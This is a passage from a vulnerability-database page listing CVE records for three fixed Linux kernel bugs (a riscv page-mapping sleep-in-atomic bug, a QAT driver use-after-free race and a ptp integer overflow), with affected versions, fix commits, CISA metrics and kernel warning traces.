	https://git.kernel.org/stable/c/fb1cf0878328fe75d…

Impacted products

Vendor

Product

Version

Linux

Affected: 5fde3db5eb028b95aeefa1ab192d36800414e8b8 , < 919f8626099d9909b9a9620b05e8c8ab06581876 (git)
Affected: 5fde3db5eb028b95aeefa1ab192d36800414e8b8 , < 8661a7af04991201640863ad1a0983173f84b5eb (git)
Affected: 5fde3db5eb028b95aeefa1ab192d36800414e8b8 , < d5257ceb19d92069195254866421f425aea42915 (git)
Affected: 5fde3db5eb028b95aeefa1ab192d36800414e8b8 , < fb1cf0878328fe75d47f0aed0a65b30126fcefc4 (git)

Linux

Affected: 5.7
Unaffected: 0 , < 5.7 (semver)
Unaffected: 6.1.95 , ≤ 6.1.* (semver)
Unaffected: 6.6.35 , ≤ 6.6.* (semver)
Unaffected: 6.9.6 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T21:57:46.415Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/919f8626099d9909b9a9620b05e8c8ab06581876"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8661a7af04991201640863ad1a0983173f84b5eb"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d5257ceb19d92069195254866421f425aea42915"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/fb1cf0878328fe75d47f0aed0a65b30126fcefc4"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-40915",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:05:49.659920Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:39.270Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "arch/riscv/mm/pageattr.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "919f8626099d9909b9a9620b05e8c8ab06581876",
              "status": "affected",
              "version": "5fde3db5eb028b95aeefa1ab192d36800414e8b8",
              "versionType": "git"
            },
            {
              "lessThan": "8661a7af04991201640863ad1a0983173f84b5eb",
              "status": "affected",
              "version": "5fde3db5eb028b95aeefa1ab192d36800414e8b8",
              "versionType": "git"
            },
            {
              "lessThan": "d5257ceb19d92069195254866421f425aea42915",
              "status": "affected",
              "version": "5fde3db5eb028b95aeefa1ab192d36800414e8b8",
              "versionType": "git"
            },
            {
              "lessThan": "fb1cf0878328fe75d47f0aed0a65b30126fcefc4",
              "status": "affected",
              "version": "5fde3db5eb028b95aeefa1ab192d36800414e8b8",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "arch/riscv/mm/pageattr.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.7"
            },
            {
              "lessThan": "5.7",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.95",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.35",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.6",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.95",
                  "versionStartIncluding": "5.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.35",
                  "versionStartIncluding": "5.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.6",
                  "versionStartIncluding": "5.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "5.7",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nriscv: rewrite __kernel_map_pages() to fix sleeping in invalid context\n\n__kernel_map_pages() is a debug function which clears the valid bit in page\ntable entry for deallocated pages to detect illegal memory accesses to\nfreed pages.\n\nThis function set/clear the valid bit using __set_memory(). __set_memory()\nacquires init_mm\u0027s semaphore, and this operation may sleep. This is\nproblematic, because  __kernel_map_pages() can be called in atomic context,\nand thus is illegal to sleep. An example warning that this causes:\n\nBUG: sleeping function called from invalid context at kernel/locking/rwsem.c:1578\nin_atomic(): 1, irqs_disabled(): 0, non_block: 0, pid: 2, name: kthreadd\npreempt_count: 2, expected: 0\nCPU: 0 PID: 2 Comm: kthreadd Not tainted 6.9.0-g1d4c6d784ef6 #37\nHardware name: riscv-virtio,qemu (DT)\nCall Trace:\n[\u003cffffffff800060dc\u003e] dump_backtrace+0x1c/0x24\n[\u003cffffffff8091ef6e\u003e] show_stack+0x2c/0x38\n[\u003cffffffff8092baf8\u003e] dump_stack_lvl+0x5a/0x72\n[\u003cffffffff8092bb24\u003e] dump_stack+0x14/0x1c\n[\u003cffffffff8003b7ac\u003e] __might_resched+0x104/0x10e\n[\u003cffffffff8003b7f4\u003e] __might_sleep+0x3e/0x62\n[\u003cffffffff8093276a\u003e] down_write+0x20/0x72\n[\u003cffffffff8000cf00\u003e] __set_memory+0x82/0x2fa\n[\u003cffffffff8000d324\u003e] __kernel_map_pages+0x5a/0xd4\n[\u003cffffffff80196cca\u003e] __alloc_pages_bulk+0x3b2/0x43a\n[\u003cffffffff8018ee82\u003e] __vmalloc_node_range+0x196/0x6ba\n[\u003cffffffff80011904\u003e] copy_process+0x72c/0x17ec\n[\u003cffffffff80012ab4\u003e] kernel_clone+0x60/0x2fe\n[\u003cffffffff80012f62\u003e] kernel_thread+0x82/0xa0\n[\u003cffffffff8003552c\u003e] kthreadd+0x14a/0x1be\n[\u003cffffffff809357de\u003e] ret_from_fork+0xe/0x1c\n\nRewrite this function with apply_to_existing_page_range(). It is fine to\nnot have any locking, because __kernel_map_pages() works with pages being\nallocated/deallocated and those pages are not changed by anyone else in the\nmeantime."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:17:44.435Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/919f8626099d9909b9a9620b05e8c8ab06581876"
        },
        {
          "url": "https://git.kernel.org/stable/c/8661a7af04991201640863ad1a0983173f84b5eb"
        },
        {
          "url": "https://git.kernel.org/stable/c/d5257ceb19d92069195254866421f425aea42915"
        },
        {
          "url": "https://git.kernel.org/stable/c/fb1cf0878328fe75d47f0aed0a65b30126fcefc4"
        }
      ],
      "title": "riscv: rewrite __kernel_map_pages() to fix sleeping in invalid context",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-40915",
    "datePublished": "2024-07-12T12:24:58.770Z",
    "dateReserved": "2024-07-12T12:17:45.581Z",
    "dateUpdated": "2025-11-03T21:57:46.415Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-26974 (GCVE-0-2024-26974)

Vulnerability from cvelistv5 – Published: 2024-05-01 05:20 – Updated: 2025-05-04 09:01

Title

crypto: qat - resolve race condition during AER recovery

Summary

In the Linux kernel, the following vulnerability has been resolved: crypto: qat - resolve race condition during AER recovery During the PCI AER system's error recovery process, the kernel driver may encounter a race condition with freeing the reset_data structure's memory. If the device restart will take more than 10 seconds the function scheduling that restart will exit due to a timeout, and the reset_data structure will be freed. However, this data structure is used for completion notification after the restart is completed, which leads to a UAF bug. This results in a KFENCE bug notice. BUG: KFENCE: use-after-free read in adf_device_reset_worker+0x38/0xa0 [intel_qat] Use-after-free read at 0x00000000bc56fddf (in kfence-#142): adf_device_reset_worker+0x38/0xa0 [intel_qat] process_one_work+0x173/0x340 To resolve this race condition, the memory associated to the container of the work_struct is freed on the worker if the timeout expired, otherwise on the function that schedules the worker. The timeout detection can be done by checking if the caller is still waiting for completion or not by using completion_done() function.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/daba62d9eeddcc5b1…
	https://git.kernel.org/stable/c/8e81cd58aee14a470…
	https://git.kernel.org/stable/c/d03092550f526a79c…
	https://git.kernel.org/stable/c/4ae5a97781ce7d6ec…
	https://git.kernel.org/stable/c/226fc408c5fcd23cc…
	https://git.kernel.org/stable/c/8a5a7611ccc7b1fba…
	https://git.kernel.org/stable/c/0c2cf5142bfb634c0…
	https://git.kernel.org/stable/c/bb279ead42263e9fb…
	https://git.kernel.org/stable/c/7d42e097607c4d246…

Impacted products

Vendor

Product

Version

Linux

Affected: d8cba25d2c68992a6e7c1d329b690a9ebe01167d , < daba62d9eeddcc5b1081be7d348ca836c83c59d7 (git)
Affected: d8cba25d2c68992a6e7c1d329b690a9ebe01167d , < 8e81cd58aee14a470891733181a47d123193ba81 (git)
Affected: d8cba25d2c68992a6e7c1d329b690a9ebe01167d , < d03092550f526a79cf1ade7f0dfa74906f39eb71 (git)
Affected: d8cba25d2c68992a6e7c1d329b690a9ebe01167d , < 4ae5a97781ce7d6ecc9c7055396535815b64ca4f (git)
Affected: d8cba25d2c68992a6e7c1d329b690a9ebe01167d , < 226fc408c5fcd23cc4186f05ea3a09a7a9aef2f7 (git)
Affected: d8cba25d2c68992a6e7c1d329b690a9ebe01167d , < 8a5a7611ccc7b1fba8d933a9f22a2e76859d94dc (git)
Affected: d8cba25d2c68992a6e7c1d329b690a9ebe01167d , < 0c2cf5142bfb634c0ef0a1a69cdf37950747d0be (git)
Affected: d8cba25d2c68992a6e7c1d329b690a9ebe01167d , < bb279ead42263e9fb09480f02a4247b2c287d828 (git)
Affected: d8cba25d2c68992a6e7c1d329b690a9ebe01167d , < 7d42e097607c4d246d99225bf2b195b6167a210c (git)

Linux

Affected: 3.17
Unaffected: 0 , < 3.17 (semver)
Unaffected: 4.19.312 , ≤ 4.19.* (semver)
Unaffected: 5.4.274 , ≤ 5.4.* (semver)
Unaffected: 5.10.215 , ≤ 5.10.* (semver)
Unaffected: 5.15.154 , ≤ 5.15.* (semver)
Unaffected: 6.1.84 , ≤ 6.1.* (semver)
Unaffected: 6.6.24 , ≤ 6.6.* (semver)
Unaffected: 6.7.12 , ≤ 6.7.* (semver)
Unaffected: 6.8.3 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26974",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-28T17:47:45.425638Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:49:36.315Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:21:05.752Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/daba62d9eeddcc5b1081be7d348ca836c83c59d7"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8e81cd58aee14a470891733181a47d123193ba81"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d03092550f526a79cf1ade7f0dfa74906f39eb71"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4ae5a97781ce7d6ecc9c7055396535815b64ca4f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/226fc408c5fcd23cc4186f05ea3a09a7a9aef2f7"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8a5a7611ccc7b1fba8d933a9f22a2e76859d94dc"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/0c2cf5142bfb634c0ef0a1a69cdf37950747d0be"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/bb279ead42263e9fb09480f02a4247b2c287d828"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7d42e097607c4d246d99225bf2b195b6167a210c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/crypto/intel/qat/qat_common/adf_aer.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "daba62d9eeddcc5b1081be7d348ca836c83c59d7",
              "status": "affected",
              "version": "d8cba25d2c68992a6e7c1d329b690a9ebe01167d",
              "versionType": "git"
            },
            {
              "lessThan": "8e81cd58aee14a470891733181a47d123193ba81",
              "status": "affected",
              "version": "d8cba25d2c68992a6e7c1d329b690a9ebe01167d",
              "versionType": "git"
            },
            {
              "lessThan": "d03092550f526a79cf1ade7f0dfa74906f39eb71",
              "status": "affected",
              "version": "d8cba25d2c68992a6e7c1d329b690a9ebe01167d",
              "versionType": "git"
            },
            {
              "lessThan": "4ae5a97781ce7d6ecc9c7055396535815b64ca4f",
              "status": "affected",
              "version": "d8cba25d2c68992a6e7c1d329b690a9ebe01167d",
              "versionType": "git"
            },
            {
              "lessThan": "226fc408c5fcd23cc4186f05ea3a09a7a9aef2f7",
              "status": "affected",
              "version": "d8cba25d2c68992a6e7c1d329b690a9ebe01167d",
              "versionType": "git"
            },
            {
              "lessThan": "8a5a7611ccc7b1fba8d933a9f22a2e76859d94dc",
              "status": "affected",
              "version": "d8cba25d2c68992a6e7c1d329b690a9ebe01167d",
              "versionType": "git"
            },
            {
              "lessThan": "0c2cf5142bfb634c0ef0a1a69cdf37950747d0be",
              "status": "affected",
              "version": "d8cba25d2c68992a6e7c1d329b690a9ebe01167d",
              "versionType": "git"
            },
            {
              "lessThan": "bb279ead42263e9fb09480f02a4247b2c287d828",
              "status": "affected",
              "version": "d8cba25d2c68992a6e7c1d329b690a9ebe01167d",
              "versionType": "git"
            },
            {
              "lessThan": "7d42e097607c4d246d99225bf2b195b6167a210c",
              "status": "affected",
              "version": "d8cba25d2c68992a6e7c1d329b690a9ebe01167d",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/crypto/intel/qat/qat_common/adf_aer.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.17"
            },
            {
              "lessThan": "3.17",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.312",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.274",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.215",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.154",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.84",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.24",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.12",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.312",
                  "versionStartIncluding": "3.17",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.274",
                  "versionStartIncluding": "3.17",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.215",
                  "versionStartIncluding": "3.17",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.154",
                  "versionStartIncluding": "3.17",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.84",
                  "versionStartIncluding": "3.17",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.24",
                  "versionStartIncluding": "3.17",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.12",
                  "versionStartIncluding": "3.17",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.3",
                  "versionStartIncluding": "3.17",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "3.17",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: qat - resolve race condition during AER recovery\n\nDuring the PCI AER system\u0027s error recovery process, the kernel driver\nmay encounter a race condition with freeing the reset_data structure\u0027s\nmemory. If the device restart will take more than 10 seconds the function\nscheduling that restart will exit due to a timeout, and the reset_data\nstructure will be freed. However, this data structure is used for\ncompletion notification after the restart is completed, which leads\nto a UAF bug.\n\nThis results in a KFENCE bug notice.\n\n  BUG: KFENCE: use-after-free read in adf_device_reset_worker+0x38/0xa0 [intel_qat]\n  Use-after-free read at 0x00000000bc56fddf (in kfence-#142):\n  adf_device_reset_worker+0x38/0xa0 [intel_qat]\n  process_one_work+0x173/0x340\n\nTo resolve this race condition, the memory associated to the container\nof the work_struct is freed on the worker if the timeout expired,\notherwise on the function that schedules the worker.\nThe timeout detection can be done by checking if the caller is\nstill waiting for completion or not by using completion_done() function."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:01:16.054Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/daba62d9eeddcc5b1081be7d348ca836c83c59d7"
        },
        {
          "url": "https://git.kernel.org/stable/c/8e81cd58aee14a470891733181a47d123193ba81"
        },
        {
          "url": "https://git.kernel.org/stable/c/d03092550f526a79cf1ade7f0dfa74906f39eb71"
        },
        {
          "url": "https://git.kernel.org/stable/c/4ae5a97781ce7d6ecc9c7055396535815b64ca4f"
        },
        {
          "url": "https://git.kernel.org/stable/c/226fc408c5fcd23cc4186f05ea3a09a7a9aef2f7"
        },
        {
          "url": "https://git.kernel.org/stable/c/8a5a7611ccc7b1fba8d933a9f22a2e76859d94dc"
        },
        {
          "url": "https://git.kernel.org/stable/c/0c2cf5142bfb634c0ef0a1a69cdf37950747d0be"
        },
        {
          "url": "https://git.kernel.org/stable/c/bb279ead42263e9fb09480f02a4247b2c287d828"
        },
        {
          "url": "https://git.kernel.org/stable/c/7d42e097607c4d246d99225bf2b195b6167a210c"
        }
      ],
      "title": "crypto: qat - resolve race condition during AER recovery",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26974",
    "datePublished": "2024-05-01T05:20:14.163Z",
    "dateReserved": "2024-02-19T14:20:24.203Z",
    "dateUpdated": "2025-05-04T09:01:16.054Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-40994 (GCVE-0-2024-40994)

Vulnerability from cvelistv5 – Published: 2024-07-12 12:37 – Updated: 2025-11-03 21:58

Title

ptp: fix integer overflow in max_vclocks_store

Summary

In the Linux kernel, the following vulnerability has been resolved: ptp: fix integer overflow in max_vclocks_store On 32bit systems, the "4 * max" multiply can overflow. Use kcalloc() to do the allocation to prevent this.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/4b03da87d0b7074c9…
	https://git.kernel.org/stable/c/d50d62d5e6ee6aa03…
	https://git.kernel.org/stable/c/666e934d749e50a37…
	https://git.kernel.org/stable/c/e1fccfb4638ee6188…
	https://git.kernel.org/stable/c/81d23d2a24012e448…

Impacted products

Vendor

Product

Version

Linux

Affected: 44c494c8e30e35713c7d11ca3c5ab332cbfabacf , < 4b03da87d0b7074c93d9662c6e1a8939f9b8b86e (git)
Affected: 44c494c8e30e35713c7d11ca3c5ab332cbfabacf , < d50d62d5e6ee6aa03c00bddb91745d0b632d3b0f (git)
Affected: 44c494c8e30e35713c7d11ca3c5ab332cbfabacf , < 666e934d749e50a37f3796caaf843a605f115b6f (git)
Affected: 44c494c8e30e35713c7d11ca3c5ab332cbfabacf , < e1fccfb4638ee6188377867f6015d0ce35764a8e (git)
Affected: 44c494c8e30e35713c7d11ca3c5ab332cbfabacf , < 81d23d2a24012e448f651e007fac2cfd20a45ce0 (git)

Linux

Affected: 5.14
Unaffected: 0 , < 5.14 (semver)
Unaffected: 5.15.162 , ≤ 5.15.* (semver)
Unaffected: 6.1.96 , ≤ 6.1.* (semver)
Unaffected: 6.6.36 , ≤ 6.6.* (semver)
Unaffected: 6.9.7 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T21:58:58.171Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4b03da87d0b7074c93d9662c6e1a8939f9b8b86e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d50d62d5e6ee6aa03c00bddb91745d0b632d3b0f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/666e934d749e50a37f3796caaf843a605f115b6f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e1fccfb4638ee6188377867f6015d0ce35764a8e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/81d23d2a24012e448f651e007fac2cfd20a45ce0"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-40994",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:01:38.458996Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:19.919Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/ptp/ptp_sysfs.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "4b03da87d0b7074c93d9662c6e1a8939f9b8b86e",
              "status": "affected",
              "version": "44c494c8e30e35713c7d11ca3c5ab332cbfabacf",
              "versionType": "git"
            },
            {
              "lessThan": "d50d62d5e6ee6aa03c00bddb91745d0b632d3b0f",
              "status": "affected",
              "version": "44c494c8e30e35713c7d11ca3c5ab332cbfabacf",
              "versionType": "git"
            },
            {
              "lessThan": "666e934d749e50a37f3796caaf843a605f115b6f",
              "status": "affected",
              "version": "44c494c8e30e35713c7d11ca3c5ab332cbfabacf",
              "versionType": "git"
            },
            {
              "lessThan": "e1fccfb4638ee6188377867f6015d0ce35764a8e",
              "status": "affected",
              "version": "44c494c8e30e35713c7d11ca3c5ab332cbfabacf",
              "versionType": "git"
            },
            {
              "lessThan": "81d23d2a24012e448f651e007fac2cfd20a45ce0",
              "status": "affected",
              "version": "44c494c8e30e35713c7d11ca3c5ab332cbfabacf",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/ptp/ptp_sysfs.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.14"
            },
            {
              "lessThan": "5.14",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.162",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.96",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.36",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.162",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.96",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.36",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.7",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
